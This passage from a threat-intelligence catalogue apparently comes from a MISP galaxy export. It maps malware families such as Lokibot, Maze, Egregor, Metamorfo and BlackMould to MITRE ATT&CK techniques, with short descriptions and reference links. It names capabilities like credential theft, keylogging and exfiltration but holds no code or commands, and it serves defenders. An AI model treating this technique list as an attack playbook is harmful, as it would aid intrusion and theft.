uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5087. Table References
Links
https://attack.mitre.org/software/S0446
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

Lokibot - S0447

[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)

The tag is: misp-galaxy:mitre-malware="Lokibot - S0447"

Lokibot - S0447 is also known as:

Lokibot

View relationships graph

Lokibot - S0447 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 5088. Table References
Links
https://attack.mitre.org/software/S0447
https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—22
https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode
https://us-cert.cisa.gov/ncas/alerts/aa20-266a
https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

Carberp - S0484

[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)

The tag is: misp-galaxy:mitre-malware="Carberp - S0484"

Carberp - S0484 is also known as:

Carberp

View relationships graph

Carberp - S0484 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"

Table 5089. Table References
Links
https://attack.mitre.org/software/S0484
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp
https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/
https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf

Maze - S0449

[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)

The tag is: misp-galaxy:mitre-malware="Maze - S0449"

Maze - S0449 is also known as:

Maze

View relationships graph

Maze - S0449 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5090. Table References
Links
https://attack.mitre.org/software/S0449
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

Zen - S0494

[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)

The tag is: misp-galaxy:mitre-malware="Zen - S0494"

Zen - S0494 is also known as:

View relationships graph

Zen - S0494 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Injection - T1540" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"

Table 5091. Table References
Links
https://attack.mitre.org/software/S0494
https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

TERRACOTTA - S0545

[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)

The tag is: misp-galaxy:mitre-malware="TERRACOTTA - S0545"

TERRACOTTA - S0545 is also known as:

TERRACOTTA

View relationships graph

TERRACOTTA - S0545 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

Table 5092. Table References
Links
https://attack.mitre.org/software/S0545
https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study

Egregor - S0554

[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)

The tag is: misp-galaxy:mitre-malware="Egregor - S0554"

Egregor - S0554 is also known as:

Egregor

View relationships graph

Egregor - S0554 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 5093. Table References
Links
https://attack.mitre.org/software/S0554
https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary
https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/
https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

Metamorfo - S0455

[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)

The tag is: misp-galaxy:mitre-malware="Metamorfo - S0455"

Metamorfo - S0455 is also known as:

Metamorfo
Casbaneiro

View relationships graph

Metamorfo - S0455 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 5094. Table References
Links
https://attack.mitre.org/software/S0455
https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767
https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/

BlackMould - S0564

[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)

The tag is: misp-galaxy:mitre-malware="BlackMould - S0564"

BlackMould - S0564 is also known as:

BlackMould

View relationships graph

BlackMould - S0564 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 5095. Table References
Links
https://attack.mitre.org/software/S0564
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

ProLock - S0654

[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)

The tag is: misp-galaxy:mitre-malware="ProLock - S0654"

ProLock - S0654 is also known as:

ProLock

View relationships graph

ProLock - S0654 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 5096. Table References
Links
https://attack.mitre.org/software/S0654
https://groupib.pathfactory.com/ransomware-reports/prolock_wp

SharpStage - S0546

[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="SharpStage - S0546"

SharpStage - S0546 is also known as:

SharpStage

View relationships graph

SharpStage - S0546 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
